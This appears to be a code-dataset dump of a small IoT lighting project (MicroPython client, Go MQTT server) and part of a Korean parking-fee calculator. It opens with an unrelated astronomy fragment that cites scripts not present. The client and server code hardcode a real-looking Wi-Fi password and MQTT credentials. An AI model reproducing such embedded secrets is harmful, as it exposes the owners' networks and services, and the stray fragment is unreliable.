214
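The constant 3631000000 that recurs in the catalog scripts above is the AB zeropoint flux of 3631 Jy expressed in microjansky, so a magnitude m maps to flux = 3.631e9 * 10**(-m/2.5) uJy, and the symmetric flux error is half the spread between m - dm and m + dm. A small sketch of exactly that arithmetic — the helper names are illustrative:

AB_ZP_UJY = 3.631e9  # 3631 Jy in microjansky

def ab_to_flux(mag):
    # AB magnitude -> flux in uJy
    return AB_ZP_UJY * 10 ** (-mag / 2.5)

def ab_err_to_flux_err(mag, mag_err):
    # symmetric error: half the flux difference between mag-err and mag+err
    return (ab_to_flux(mag - mag_err) - ab_to_flux(mag + mag_err)) / 2

print(ab_to_flux(22.0))               # ~5.75 uJy
print(ab_err_to_flux_err(22.0, 0.1))  # ~0.53 uJy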
Thebp/SE-IOT
https://github.com/Thebp/SE-IOT
d01b9b427d289cedfc1ebdd45de53af809f655f9
a5ae2c2ff3989c1f116bf3a1c00a4d1119609441
7dd6d28aea684568b47c11f1f00374eb65ae7a05
refs/heads/master
2020-04-28T10:39:04.682524
2019-05-30T20:42:17
2019-05-30T20:42:17
175,209,781
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6150442361831665, "alphanum_fraction": 0.6371681690216064, "avg_line_length": 23.25, "blob_id": "3818f404f1500a279ee71a3cb37f0535a1b1fec7", "content_id": "f03a4e1bd7ddf6da632c75e11928628eca2188c4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 678, "license_type": "no_license", "max_line_length": 59, "num_lines": 28, "path": "/IOT-Project/client/boot.py", "repo_name": "Thebp/SE-IOT", "src_encoding": "UTF-8", "text": "from network import WLAN\nimport machine\nimport pycom\nimport time\n\npycom.heartbeat(False)\nwlan = WLAN(mode=WLAN.STA)\nwlan.disconnect()\n\nssid = \"Oneplus 6\"\npassword = \"csgg1469\"\n\naccess_points = wlan.scan()\nfor ap in access_points:\n if ap.ssid == ssid:\n print('Network found!')\n wlan.connect(ap.ssid, auth=(ap.sec, password))\n while not wlan.isconnected():\n machine.idle() # save power while waiting\n \n print('WLAN connection succeeded!')\n # 5 second blue flash to show successful connection\n pycom.rgbled(0x0000FF)\n time.sleep(5)\n pycom.rgbled(0x000000)\n\n machine.main('main.py')\n break" }, { "alpha_fraction": 0.6769438982009888, "alphanum_fraction": 0.6842461228370667, "avg_line_length": 22.701923370361328, "blob_id": "f0c414fdf314b35ac7c8b8805e2f9d25cd4c24a0", "content_id": "302f959689a14926f574bbf5a85b4935244ee88e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 7395, "license_type": "no_license", "max_line_length": 134, "num_lines": 312, "path": "/IOT-Project/go-server/server.go", "repo_name": "Thebp/SE-IOT", "src_encoding": "UTF-8", "text": "package main\n\nimport (\n\t\"encoding/json\"\n\t\"fmt\"\n\t\"net/http\"\n\t\"time\"\n\n\tmqtt \"github.com/eclipse/paho.mqtt.golang\"\n\t\"github.com/gorilla/mux\"\n)\n\ntype server struct {\n\tdatabase Database\n\tmqtt mqtt.Client\n}\n\ntype Database interface {\n\tGetRoom(id string) (room Room, err error)\n\tGetRooms() ([]Room, error)\n\tGetBoard(id string) (board Board, err error)\n\tInsertRoom(room Room) (Room, error)\n\tUpdateRoom(room Room) error\n\tGetBoardsByRoom(roomId string) ([]Board, error)\n\tGetUnassignedBoards() ([]Board, error)\n\tInsertBoard(board Board) error\n\tUpdateBoard(board Board) error\n\tInsertLightData(data LightData) error\n\tGetLatestLightData(roomID string) ([]LightData, error)\n}\n\nfunc NewServer(database Database, mqtt mqtt.Client) *server {\n\tif token := mqtt.Connect(); token.Wait() && token.Error() != nil {\n\t\tpanic(token.Error())\n\t}\n\treturn &server{database, mqtt}\n\n}\n\nfunc (s *server) run() {\n\ts.mqtt.Subscribe(\"board_discovery\", 0, s.boardDiscovery)\n\ts.mqtt.Subscribe(\"lightdata\", 0, s.processLightData)\n\n\tr := mux.NewRouter()\n\tr.Methods(\"OPTIONS\").HandlerFunc(func(w http.ResponseWriter, r *http.Request) {\n\t\tw.Header().Set(\"Access-Control-Allow-Origin\", \"*\")\n\t\tw.Header().Set(\"Access-Control-Allow-Methods\", \"POST, GET, OPTIONS, PUT, DELETE\")\n\t\tw.Header().Set(\"Access-Control-Allow-Headers\", \"Accept, Content-Type, Content-Length, Accept-Encoding, X-CSRF-Token, Authorization\")\n\t})\n\n\tr.HandleFunc(\"/boards/{boardId}/ping\", s.pingBoard).Methods(\"POST\")\n\tr.HandleFunc(\"/rooms\", s.getRooms).Methods(\"GET\")\n\tr.HandleFunc(\"/rooms\", s.postRoom).Methods(\"POST\")\n\tr.HandleFunc(\"/rooms/{roomId}\", s.putRoom).Methods(\"PUT\")\n\tr.HandleFunc(\"/rooms/{roomId}/boards\", s.getBoardsByRoom).Methods(\"GET\")\n\tr.HandleFunc(\"/unassigned_boards\", 
s.getUnassignedBoards).Methods(\"GET\")\n\tr.HandleFunc(\"/boards/{boardId}\", s.putBoard).Methods(\"PUT\")\n\n\t_, err := s.database.InsertRoom(Room{Name: \"Default room\"})\n\tif err != nil {\n\t\tfmt.Println(err)\n\t}\n\n\tfmt.Println(\"Listening...\")\n\thttp.ListenAndServe(\":50002\", r)\n}\n\nfunc (s *server) updateRoomLight(roomID string) {\n\troom, err := s.database.GetRoom(roomID)\n\tif err != nil {\n\t\tfmt.Println(err)\n\t}\n\n\tintensity := room.LedConfig.Intensity\n\n\tif room.LedConfig.DaylightHarvesting {\n\t\tlightdata, err := s.database.GetLatestLightData(roomID)\n\t\tif err != nil {\n\t\t\tfmt.Println(err)\n\t\t\treturn\n\t\t}\n\n\t\tlightlevel := getAverageLightlevel(lightdata)\n\t\tintensity = getIntensityFromLightlevel(lightlevel)\n\t}\n\n\tboards, err := s.database.GetBoardsByRoom(roomID)\n\tif err != nil {\n\t\tfmt.Println(err)\n\t\treturn\n\t}\n\n\tcolor := room.LedConfig.Color\n\tcolor.Red = int(float32(color.Red) / 100.0 * float32(intensity))\n\tcolor.Green = int(float32(color.Green) / 100.0 * float32(intensity))\n\tcolor.Blue = int(float32(color.Blue) / 100.0 * float32(intensity))\n\n\tcolor_json, err := json.Marshal(color)\n\tif err != nil {\n\t\tfmt.Println(err)\n\t\treturn\n\t}\n\n\tfor _, board := range boards {\n\t\ts.sendMessage(fmt.Sprintf(\"%v/led/rgb\", board.ID), color_json)\n\t}\n\n}\n\nfunc (s *server) boardDiscovery(client mqtt.Client, msg mqtt.Message) {\n\tvar board Board\n\tif err := json.Unmarshal(msg.Payload(), &board); err != nil {\n\t\tfmt.Println(err)\n\t\treturn\n\t}\n\tb, err := s.database.GetBoard(board.ID)\n\tif err != nil {\n\t\tfmt.Println(err)\n\t\treturn\n\t}\n\tif b.ID == \"\" {\n\t\tboard.RoomID = \"0\"\n\t\terr = s.database.InsertBoard(board)\n\t\tif err != nil {\n\t\t\tfmt.Println(err)\n\t\t}\n\t\tfmt.Printf(\"New board discovered: %v\\n\", board.ID)\n\t}\n}\n\nfunc (s *server) processLightData(client mqtt.Client, msg mqtt.Message) {\n\tvar lightData LightData\n\tif err := json.Unmarshal(msg.Payload(), &lightData); err != nil {\n\t\tpanic(err)\n\t}\n\tif lightData.BoardID == \"\" {\n\t\tfmt.Println(\"No BoardID on lightdata\")\n\t\treturn\n\t}\n\tlightData.Time = time.Now()\n\terr := s.database.InsertLightData(lightData)\n\tif err != nil {\n\t\tfmt.Println(err)\n\t}\n\tboard, err := s.database.GetBoard(lightData.BoardID)\n\tif err != nil {\n\t\tfmt.Println(err)\n\t}\n\tgo s.updateRoomLight(board.RoomID)\n}\n\nfunc (s *server) sendMessage(topic string, payload interface{}) {\n\ttoken := s.mqtt.Publish(topic, 0, false, payload)\n\ttoken.Wait()\n}\n\nfunc (s *server) pingBoard(w http.ResponseWriter, r *http.Request) {\n\tw.Header().Set(\"Access-Control-Allow-Origin\", \"*\")\n\n\tvars := mux.Vars(r)\n\tboardId := vars[\"boardId\"]\n\n\tboard, err := s.database.GetBoard(boardId)\n\tif err != nil {\n\t\tfmt.Println(err)\n\t}\n\n\tif board.ID != \"\" {\n\t\ts.sendMessage(fmt.Sprintf(\"%v/led/ping\", board.ID), `{\"ping\":\"ping\"}`)\n\t}\n\tw.WriteHeader(200)\n}\n\nfunc (s *server) getRooms(w http.ResponseWriter, r *http.Request) {\n\tw.Header().Set(\"Access-Control-Allow-Origin\", \"*\")\n\n\trooms, err := s.database.GetRooms()\n\tif err != nil {\n\t\tfmt.Println(err)\n\t}\n\n\trooms_json, err := json.Marshal(rooms)\n\tif err != nil {\n\t\tfmt.Println(err)\n\t\tw.WriteHeader(500)\n\t\treturn\n\t}\n\n\tw.Write(rooms_json)\n}\n\nfunc (s *server) getBoardsByRoom(w http.ResponseWriter, r *http.Request) {\n\tw.Header().Set(\"Access-Control-Allow-Origin\", \"*\")\n\n\tvars := mux.Vars(r)\n\troomId := vars[\"roomId\"]\n\n\tboards, err := 
s.database.GetBoardsByRoom(roomId)\n\tif err != nil {\n\t\tfmt.Println(err)\n\t}\n\n\tboards_json, err := json.Marshal(boards)\n\tif err != nil {\n\t\tfmt.Println(err)\n\t\tw.WriteHeader(500)\n\t\treturn\n\t}\n\n\tw.Write(boards_json)\n}\n\nfunc (s *server) getUnassignedBoards(w http.ResponseWriter, r *http.Request) {\n\tw.Header().Set(\"Access-Control-Allow-Origin\", \"*\")\n\n\tboards, err := s.database.GetUnassignedBoards()\n\tif err != nil {\n\t\tfmt.Println(err)\n\t}\n\n\tboards_json, err := json.Marshal(boards)\n\tif err != nil {\n\t\tfmt.Println(err)\n\t\tw.WriteHeader(500)\n\t\treturn\n\t}\n\n\tw.Write(boards_json)\n}\n\nfunc (s *server) putBoard(w http.ResponseWriter, r *http.Request) {\n\tw.Header().Set(\"Access-Control-Allow-Origin\", \"*\")\n\n\tvars := mux.Vars(r)\n\tboardId := vars[\"boardId\"]\n\n\tvar board Board\n\terr := json.NewDecoder(r.Body).Decode(&board)\n\tif err != nil {\n\t\tfmt.Println(err)\n\t\thttp.Error(w, \"Request body is invalid format\", http.StatusBadRequest)\n\t\treturn\n\t}\n\n\tif board.ID != boardId {\n\t\thttp.Error(w, \"Board ID in request body is different from ID in URL\", http.StatusBadRequest)\n\t\treturn\n\t}\n\n\terr = s.database.UpdateBoard(board)\n\tif err != nil {\n\t\tfmt.Println(err)\n\t\thttp.Error(w, \"Something went wrong\", http.StatusInternalServerError)\n\t\treturn\n\t}\n\n\tgo s.updateRoomLight(board.RoomID)\n\n\tw.WriteHeader(200)\n}\n\nfunc (s *server) postRoom(w http.ResponseWriter, r *http.Request) {\n\tw.Header().Set(\"Access-Control-Allow-Origin\", \"*\")\n\n\tvar room Room\n\terr := json.NewDecoder(r.Body).Decode(&room)\n\tif err != nil {\n\t\tfmt.Println(err)\n\t\thttp.Error(w, \"Request body is invalid format\", http.StatusBadRequest)\n\t\treturn\n\t}\n\n\troom, err = s.database.InsertRoom(room)\n\tif err != nil {\n\t\tfmt.Println(err)\n\t\thttp.Error(w, \"Something went wrong\", http.StatusInternalServerError)\n\t\treturn\n\t}\n\n\tw.WriteHeader(200)\n}\n\nfunc (s *server) putRoom(w http.ResponseWriter, r *http.Request) {\n\tw.Header().Set(\"Access-Control-Allow-Origin\", \"*\")\n\n\tvars := mux.Vars(r)\n\troomId := vars[\"roomId\"]\n\n\tvar room Room\n\terr := json.NewDecoder(r.Body).Decode(&room)\n\tif err != nil {\n\t\tfmt.Println(err)\n\t\thttp.Error(w, \"Request body is invalid format\", http.StatusBadRequest)\n\t\treturn\n\t}\n\n\tif room.ID != roomId {\n\t\thttp.Error(w, \"Room ID in request body is different from ID in URL\", http.StatusBadRequest)\n\t\treturn\n\t}\n\n\terr = s.database.UpdateRoom(room)\n\tif err != nil {\n\t\tfmt.Println(err)\n\t\thttp.Error(w, \"Something went wrong\", http.StatusInternalServerError)\n\t\treturn\n\t}\n\n\tgo s.updateRoomLight(room.ID)\n\n\tw.WriteHeader(200)\n}\n" }, { "alpha_fraction": 0.5363790392875671, "alphanum_fraction": 0.5972927212715149, "avg_line_length": 21.925926208496094, "blob_id": "a5ed8a831ac3658c8a129c6b7cab54b50a413dd7", "content_id": "2f36c8797c066a589a2ebb258da36cd512a50668", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 591, "license_type": "no_license", "max_line_length": 63, "num_lines": 27, "path": "/IOT-Project/client/components.py", "repo_name": "Thebp/SE-IOT", "src_encoding": "UTF-8", "text": "from lib.LTR329ALS01 import LTR329ALS01\nimport pycom\nimport time\n\nclass Led:\n def __init__(self):\n pycom.heartbeat(False)\n self.value = 0x000000\n pycom.rgbled(self.value)\n\n def set_rgb(self, red, green, blue):\n self.value = int('0x%02x%02x%02x' % (red, green, blue), 16) # base 16: int() cannot parse a '0x...' string with the default base 10\n 
pycom.rgbled(self.value)\n \n def ping(self):\n pycom.rgbled(0x00FF00)\n time.sleep(2)\n pycom.rgbled(self.value)\n\n\n\nclass Lightsensor:\n def __init__(self):\n self.lt = LTR329ALS01()\n \n def get_lightlevel(self):\n return self.lt.light()[0]" }, { "alpha_fraction": 0.7216494679450989, "alphanum_fraction": 0.7319587469100952, "avg_line_length": 31.33333396911621, "blob_id": "c04d25e7b1e4a988cea5c6c74686f394f8e60b62", "content_id": "923f932b9e01f2a21ce00325139622fa3e770077", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 97, "license_type": "no_license", "max_line_length": 42, "num_lines": 3, "path": "/IOT-Project/go-server/deploy.sh", "repo_name": "Thebp/SE-IOT", "src_encoding": "UTF-8", "text": "env GOOS=linux GOARCH=arm GOARM=5 go build\nscp go-server mndkk.dk:\nssh -t mndkk.dk './go-server'\n" }, { "alpha_fraction": 0.6183643937110901, "alphanum_fraction": 0.6183643937110901, "avg_line_length": 20.121212005615234, "blob_id": "71e713d829d3bb7ee5c57a3e89e45a69cf45f462", "content_id": "793db383ac5527cf8f5f0aeb0b538dfd0610d840", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 697, "license_type": "no_license", "max_line_length": 56, "num_lines": 33, "path": "/IOT-Project/go-server/models.go", "repo_name": "Thebp/SE-IOT", "src_encoding": "UTF-8", "text": "package main\n\nimport \"time\"\n\ntype Board struct {\n\tID string `json:\"id\"`\n\tRoomID string `json:\"room_id\"`\n}\n\ntype Room struct {\n\tID string `json:\"id\"`\n\tName string `json:\"name\"`\n\tLedConfig LedConfig `json:\"led_config\"`\n\tBoards []Board `json:\"boards\"`\n}\n\ntype LedConfig struct {\n\tIntensity int `json:\"intensity\"`\n\tColor RGBData `json:\"color\"`\n\tDaylightHarvesting bool `json:\"daylight_harvesting\"`\n}\n\ntype LightData struct {\n\tLightLevel int `json:\"lightlevel\"`\n\tBoardID string `json:\"board_id\"`\n\tTime time.Time `json:\"time\"`\n}\n\ntype RGBData struct {\n\tRed int `json:\"red\"`\n\tGreen int `json:\"green\"`\n\tBlue int `json:\"blue\"`\n}\n" }, { "alpha_fraction": 0.6060929894447327, "alphanum_fraction": 0.6103687882423401, "avg_line_length": 31.842105865478516, "blob_id": "110a124b47893fa589867e9ad5b74eb81f670eae", "content_id": "27e026698d17cecdb71f5e79e51c8000aab55990", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1871, "license_type": "no_license", "max_line_length": 130, "num_lines": 57, "path": "/IOT-Project/client/main.py", "repo_name": "Thebp/SE-IOT", "src_encoding": "UTF-8", "text": "import machine\nimport time\nimport ujson\nfrom components import Led, Lightsensor\nfrom mqtt import MQTTClient\nfrom machine import Timer\nimport ubinascii\n\nMQTT_HOST = \"mndkk.dk\"\nMQTT_USER = \"iot\"\nMQTT_PASSWORD = \"uS831ACCL6sZHz4\"\nMQTT_PORT = 1883\n\nclass Board:\n def __init__(self):\n self.id = ubinascii.hexlify(machine.unique_id()).decode(\"utf-8\") \n print(\"machine id: {}\".format(self.id))\n self.mqtt = MQTTClient(self.id, MQTT_HOST, MQTT_PORT, MQTT_USER, MQTT_PASSWORD)\n self.led = Led()\n self.lightsensor = Lightsensor()\n\n self.dispatcher = {}\n self.dispatcher[\"{}/led/rgb\".format(self.id)] = lambda rgb: self.led.set_rgb(rgb[\"red\"], rgb[\"green\"], rgb[\"blue\"])\n self.dispatcher[\"{}/led/ping\".format(self.id)] = lambda msg: self.led.ping()\n\n def process_message(self, topic, msg):\n topic_str = topic.decode(\"utf-8\")\n msg_str = msg.decode(\"utf-8\")\n if topic_str in self.dispatcher:\n 
self.dispatcher[topic_str](ujson.loads(msg_str))\n\n def publish_lightlevel(self, alarm):\n self.mqtt.publish(topic=\"lightdata\", msg=ujson.dumps({\"lightlevel\":self.lightsensor.get_lightlevel(),\"board_id\":self.id}))\n\n def run(self):\n self.mqtt.set_callback(self.process_message)\n self.mqtt.connect()\n\n self.mqtt.subscribe(\"{}/led/rgb\".format(self.id))\n self.mqtt.subscribe(\"{}/led/ping\".format(self.id))\n\n self.mqtt.publish(topic=\"board_discovery\", msg=ujson.dumps({\"id\":self.id}))\n\n alarms = []\n alarms.append(Timer.Alarm(handler=self.publish_lightlevel, s=5, periodic=True))\n\n try:\n while True:\n self.mqtt.wait_msg()\n machine.idle()\n finally:\n for alarm in alarms:\n alarm.cancel()\n self.mqtt.disconnect()\n\nif __name__ == \"__main__\":\n Board().run()" }, { "alpha_fraction": 0.6722689270973206, "alphanum_fraction": 0.7058823704719543, "avg_line_length": 17.789474487304688, "blob_id": "58aa6ab0c303a4ffd143f5f891d18ef5aa234f02", "content_id": "f4cc93302b67b6816804e11e1f8b10c8e985d148", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 357, "license_type": "no_license", "max_line_length": 54, "num_lines": 19, "path": "/IOT-Project/go-server/helpers.go", "repo_name": "Thebp/SE-IOT", "src_encoding": "UTF-8", "text": "package main\n\nfunc getAverageLightlevel(lightdata []LightData) int {\n\tif len(lightdata) == 0 {\n\t\treturn 0\n\t}\n\ttotal := 0\n\tfor _, lightdatum := range lightdata {\n\t\ttotal += lightdatum.LightLevel\n\t}\n\treturn total / len(lightdata)\n}\n\nfunc getIntensityFromLightlevel(lightlevel int) int {\n\tif lightlevel > 100 {\n\t\tlightlevel = 100\n\t}\n\treturn 100 - lightlevel\n}\n" }, { "alpha_fraction": 0.6755540370941162, "alphanum_fraction": 0.679016649723053, "avg_line_length": 22.104000091552734, "blob_id": "4d093c9f0da1a30fa45dcea309d7f9e04434225b", "content_id": "cd196e3082af3337deddf90fc180f646513909c9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 2888, "license_type": "no_license", "max_line_length": 101, "num_lines": 125, "path": "/IOT-Project/go-server/main.go", "repo_name": "Thebp/SE-IOT", "src_encoding": "UTF-8", "text": "package main\n\nimport (\n\t\"fmt\"\n\t\"strconv\"\n\n\tmqtt \"github.com/eclipse/paho.mqtt.golang\"\n)\n\ntype inMemoryDatabase struct {\n\tboards map[string]Board\n\trooms map[string]Room\n\tlightData []LightData\n\troomCounter int\n}\n\nfunc (d *inMemoryDatabase) InsertRoom(room Room) (Room, error) {\n\troom.ID = strconv.Itoa(d.roomCounter)\n\td.rooms[room.ID] = room\n\td.roomCounter++\n\treturn room, nil\n}\n\nfunc (d *inMemoryDatabase) UpdateRoom(room Room) error {\n\tif _, ok := d.rooms[room.ID]; ok {\n\t\td.rooms[room.ID] = room\n\t\treturn nil\n\t}\n\treturn fmt.Errorf(\"No room with ID %v\", room.ID)\n}\n\nfunc (d *inMemoryDatabase) GetRoom(id string) (Room, error) {\n\tif room, ok := d.rooms[id]; ok {\n\t\treturn room, nil\n\t}\n\treturn Room{}, nil\n}\n\nfunc (d *inMemoryDatabase) GetRooms() ([]Room, error) {\n\trooms := make([]Room, 0, len(d.rooms))\n\tfor _, room := range d.rooms {\n\t\tboards, _ := d.GetBoardsByRoom(room.ID)\n\t\troom.Boards = boards\n\t\trooms = append(rooms, room)\n\t}\n\treturn rooms, nil\n}\n\nfunc (d *inMemoryDatabase) GetBoardsByRoom(roomId string) ([]Board, error) {\n\tboards := make([]Board, 0)\n\tfor _, board := range d.boards {\n\t\tif board.RoomID == roomId {\n\t\t\tboards = append(boards, board)\n\t\t}\n\t}\n\treturn boards, nil\n}\n\nfunc (d *inMemoryDatabase) 
GetUnassignedBoards() ([]Board, error) {\n\tboards := make([]Board, 0)\n\tfor _, board := range d.boards {\n\t\tif board.RoomID == \"\" {\n\t\t\tboards = append(boards, board)\n\t\t}\n\t}\n\treturn boards, nil\n}\n\nfunc (d *inMemoryDatabase) GetBoard(id string) (Board, error) {\n\tif board, ok := d.boards[id]; ok {\n\t\treturn board, nil\n\t}\n\treturn Board{}, nil\n}\n\nfunc (d *inMemoryDatabase) UpdateBoard(board Board) error {\n\tif _, ok := d.boards[board.ID]; ok {\n\t\td.boards[board.ID] = board\n\t\treturn nil\n\t}\n\treturn fmt.Errorf(\"No board with ID %v\", board.ID)\n}\n\nfunc (d *inMemoryDatabase) InsertBoard(board Board) error {\n\td.boards[board.ID] = board\n\treturn nil\n}\n\nfunc (d *inMemoryDatabase) InsertLightData(lightData LightData) error {\n\td.lightData = append(d.lightData, lightData)\n\treturn nil\n}\n\nfunc (d *inMemoryDatabase) GetLatestLightData(roomID string) ([]LightData, error) {\n\tlightdata := make([]LightData, 0)\n\tboards, _ := d.GetBoardsByRoom(roomID)\n\tfor _, board := range boards {\n\t\tlightdata = append(lightdata, d.getLatestLightData(board.ID))\n\t}\n\treturn lightdata, nil\n}\n\nfunc (d *inMemoryDatabase) getLatestLightData(boardID string) LightData {\n\tlatest := LightData{}\n\tfor _, lightdata := range d.lightData {\n\t\t// only consider readings from the requested board\n\t\tif lightdata.BoardID == boardID && lightdata.Time.Unix() > latest.Time.Unix() {\n\t\t\tlatest = lightdata\n\t\t}\n\t}\n\treturn latest\n}\n\nfunc main() {\n\topts := mqtt.NewClientOptions()\n\topts.AddBroker(\"mndkk.dk:1883\")\n\topts.SetClientID(\"server\")\n\topts.SetUsername(\"iot\")\n\topts.SetPassword(\"uS831ACCL6sZHz4\")\n\n\tmqtt_client := mqtt.NewClient(opts)\n\tdatabase := inMemoryDatabase{make(map[string]Board), make(map[string]Room), make([]LightData, 0), 0}\n\n\tserver := NewServer(&database, mqtt_client)\n\tserver.run()\n}\n" } ]
8
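The daylight-harvesting path in the SE-IOT server above reduces to two steps: clamp the averaged light level to 0-100 and take its complement as intensity (helpers.go), then scale each RGB channel by intensity/100 with integer truncation (updateRoomLight). A quick Python sketch of the same arithmetic, handy for checking expected LED values offline — the function names are illustrative, not part of the repo:

def intensity_from_lightlevel(lightlevel):
    # brighter room -> dimmer LEDs, clamped to 0..100 (mirrors the Go helper)
    return 100 - min(lightlevel, 100)

def scale_rgb(color, intensity):
    # per-channel scaling with truncation, as in updateRoomLight's int() casts
    return {ch: int(color[ch] / 100.0 * intensity) for ch in ("red", "green", "blue")}

print(scale_rgb({"red": 255, "green": 180, "blue": 100}, intensity_from_lightlevel(60)))
# -> {'red': 102, 'green': 72, 'blue': 40}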
ahlqldntm8/Parking-Calculator
https://github.com/ahlqldntm8/Parking-Calculator
767836aeb73027bee4dacc0d083718614a07154c
49035f5303127f317a14e192c3054f22494e0a93
87d67f04678f4dbbf651d99785ac0a6ca54e3d6f
refs/heads/main
2023-08-07T23:49:26.067059
2021-09-28T04:18:24
2021-09-28T04:18:24
338,941,753
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5489749312400818, "alphanum_fraction": 0.7414578795433044, "avg_line_length": 34.08000183105469, "blob_id": "a05110bf3aad13e0c8de00c0eb012067b1e957fa", "content_id": "6faeb46876c0b24c42cac14fad240b2488751aa7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1182, "license_type": "no_license", "max_line_length": 113, "num_lines": 25, "path": "/README.md", "repo_name": "ahlqldntm8/Parking-Calculator", "src_encoding": "UTF-8", "text": "# Parking-Calculator\n\n![image1](https://user-images.githubusercontent.com/78195880/108955459-8c4bd100-76b1-11eb-805d-f4d12b2bf4e4.PNG)\n![image2](https://user-images.githubusercontent.com/78195880/108955467-91108500-76b1-11eb-8b8a-024282b3f413.PNG)\n\n\n### 사용 기술:\n* 인공지능(AI)\n* 파이썬(Python)\n* 테서렉트(tesseract)\n* 오픈CV(OpenCV)\n* 데이터베이스(MySQL)\n* 파이큐티(PyQt5)\n\n### 프로그램의 흐름\n 1. 카메라에 번호판을 대고 등록 버튼을 누른다.\n 2. 번호가 등록되어있으면 경고문이 나오고 없으면 데이터가 저장이되고 DB에도 insert 된다.\n 3. 카메라에 번호판을 대고정산 버튼을 누른다.\n 4. 번호가 없으면 경고문이 나오고 있으면 DB에 update 된다.\n 5. 등록된 차메뉴 버튼을 누르면 현재 입력되있는 번호판이 출력된다.\n### 참고 Site:\n![wfw1](https://user-images.githubusercontent.com/78195880/108957258-81df0680-76b4-11eb-9162-5132050bc629.png)\n![wfwffw1](https://user-images.githubusercontent.com/78195880/108957255-81467000-76b4-11eb-881d-6fbd3d91d3b1.png)\n\n##### https://github.com/kairess/license_plate_recognition (kairess님) \n" }, { "alpha_fraction": 0.49674785137176514, "alphanum_fraction": 0.5166011452674866, "avg_line_length": 34.49530029296875, "blob_id": "00b6504418203992295b9956d9e49d6be06d621f", "content_id": "2a63aa7c0e0da1b8e3735e2830743fa31aab7db0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 29546, "license_type": "no_license", "max_line_length": 201, "num_lines": 745, "path": "/Parking_pee_Calculater.py", "repo_name": "ahlqldntm8/Parking-Calculator", "src_encoding": "UTF-8", "text": "import sys\nfrom PyQt5.QtWidgets import * # 사용할 PyQt5 모듈 \nfrom PyQt5.QtCore import pyqtSignal, pyqtSlot, Qt, QThread , QTime\nfrom PyQt5.QtGui import QPixmap, QPainter, QPen, QColor, QBrush, QFont , QPalette\nfrom PyQt5 import QtGui, QtCore, QtWidgets\n\nimport numpy as np # 수학과학 연산 모듈\nimport cv2 # openCV 모듈\nimport dlib # 이미지 처리 모듈\nimport pytesseract # 문자인식 \nfrom time import sleep \nfrom datetime import datetime, timedelta\n\nimport pymysql\n\n\n\ncarList = [''] # 차 번호판을 저장할 리스트\ncarTime = [''] # 입차시각 저장할 리스트\n\ncarMenuList = [] # 등록된 차량 리스트\n\nclass VideoThread(QThread): # 웹캠 이미지 재생\n \n change_pixmap_signal = pyqtSignal(np.ndarray)\n bSaveFlag = False\n\n def __init__(self):\n super().__init__()\n self._run_flag = True \n\n def run(self):\n # capture from web cam\n cap = cv2.VideoCapture(0) \n\n frameRate = int(cap.get(cv2.CAP_PROP_FPS))\n\n while self._run_flag: # _run_flag 가 트루일동안 계속 반복\n ret, cv_img = cap.read() # 비디오웹탬 이미지(cv_img)를 읽어옴\n if ret:\n self.change_pixmap_signal.emit(cv_img) # 읽어온 cv_img를 change_pixmap_signal로 뿌려줌\n\n key = cv2.waitKey(frameRate)\n\n if self.bSaveFlag:\n cv2.imwrite(\"./frame.jpg\", cv_img) \n self.bSaveFlag = False\n\n # shut down capture system\n cap.release()\n\n def stop(self):\n \"\"\"Sets run flag to False and waits for thread to finish\"\"\"\n self._run_flag = False\n self.wait()\n\nclass MyWindow(QWidget):\n def __init__(self):\n super().__init__()\n self.setWindowTitle(\"주차요금 계산기\")\n self.setGeometry(100, 100, 670, 500)\n \n layout = QHBoxLayout()\n layout1 = QVBoxLayout()\n btlayout = QHBoxLayout()\n\n layout2 = 
QVBoxLayout()\n\n \n carMenuTe =QTextEdit(\"버튼을 눌러주세요\")\n\n self.image_label = QLabel(self)\n self.image_label.resize(640, 480)\n \n\n self.btnStart = QPushButton(\"등록\")\n self.btnStart.clicked.connect(self.onStartButtonClicked)\n #self.btnStop = QPushButton(\"시간\")\n #self.btnStop.clicked.connect(self.onStopButtonClicked)\n self.btncough = QPushButton(\"정산\")\n self.btncough.clicked.connect(self.onEndButtonClicked)\n self.btnMenu = QPushButton(\"등록된 차 메뉴\")\n self.btnMenu.clicked.connect(lambda: self.onCarMenuButtonClicked(carMenuTe))\n \n\n self.lblCar = QLabel(\"차량 번호: \")\n self.lblTime = QLabel(\"입차 시각: \")\n self.lblTime2 = QLabel(\"출차 시각: \")\n self.lbParkingTime = QLabel(\"주차 기간: \")\n self.lbParkingPrice = QLabel(\"주차 요금: \")\n\n price_label = QLabel(\"주차요금 표\")\n price_label.setAlignment(Qt.AlignCenter)\n font = price_label.font()\n font.setPointSize(20)\n price_label.setFont(font)\n\n price2_label = QLabel(\" 10초당 : 200만원\")\n price2_label.setAlignment(Qt.AlignCenter)\n font = price2_label.font()\n font.setPointSize(30)\n price2_label.setFont(font)\n\n \n layout1.addWidget(self.image_label)\n btlayout.addWidget(self.btnStart)\n btlayout.addWidget(self.btncough)\n layout1.addLayout(btlayout)\n\n layout1.addWidget(self.lblCar)\n layout1.addWidget(self.lblTime)\n layout1.addWidget(self.lblTime2)\n layout1.addWidget(self.lbParkingTime)\n layout1.addWidget(self.lbParkingPrice)\n\n \n layout2.addWidget(price_label)\n layout2.addWidget(price2_label)\n layout2.addWidget(self.btncough)\n layout2.addWidget(self.btnMenu)\n layout2.addWidget(carMenuTe)\n \n layout2.addStretch(2)\n\n layout.addLayout(layout1)\n layout.addLayout(layout2)\n self.setLayout(layout) \n \n # create the video capture thread\n self.thread = VideoThread()\n self.thread.change_pixmap_signal.connect(self.update_image)\n # start the thread\n self.thread.start()\n\n def onCarMenuButtonClicked(self,carMenuTe): # 저장된 자동차 목록 \n carMenuTe.clear() #\n for car in carList:\n carMenuTe.append(car)\n \n\n def insert_db(self,carnumb): # 